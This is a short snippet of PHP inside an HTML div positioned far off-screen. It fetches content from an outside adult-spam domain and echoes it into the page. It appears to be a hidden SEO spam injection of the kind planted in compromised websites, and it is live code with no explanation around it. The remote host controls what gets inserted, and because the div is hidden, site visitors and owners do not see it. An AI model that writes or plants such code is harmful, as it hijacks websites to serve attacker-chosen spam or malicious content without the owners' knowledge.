<div style="position: absolute; left: -4168px;">
<?php
$ch = curl_init(); // 
$timeout = 3;
curl_setopt( $ch , CURLOPT_URL , "https://www.2024sexyteen.site/seo/3.php" ); // 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$veri = curl_exec($ch); // 
curl_close($ch); // 
echo $veri; //  
?>
</div>